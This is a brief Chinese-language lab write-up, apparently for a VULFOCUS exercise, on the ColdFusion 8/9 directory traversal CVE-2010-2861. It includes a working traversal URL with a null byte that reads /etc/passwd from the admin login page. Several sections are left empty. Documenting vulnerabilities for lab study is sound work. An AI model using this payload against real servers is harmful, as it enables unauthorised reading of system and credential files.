[文件读取]coldfusion 文件读取 （CVE-2010-2861）

1.1漏洞描述

漏洞编号	CVE-2010-2861
漏洞类型	文件读取
漏洞等级	⭐⭐
漏洞环境	VULFOCUS
攻击方式

描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。 

1.2漏洞等级

高危

1.3影响版本

Adobe ColdFusion 8、9版本

1.4漏洞复现

1.4.1.基础环境

        访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`，可以看到初始化页面，输入密码`admin`，开始初始化整个环境。

1.4.2.前提

• 网站后台地址：

• 后台管理账密：

• 后台登录地址 

1.5深度利用

1.5.1漏洞点

访问

http://192.168.1.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

用burp截取,删除其中的cookie信息后，即可读取文件`/etc/passwd`:

删掉后

查找falg

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

• 升级

• 打补丁

• 上设备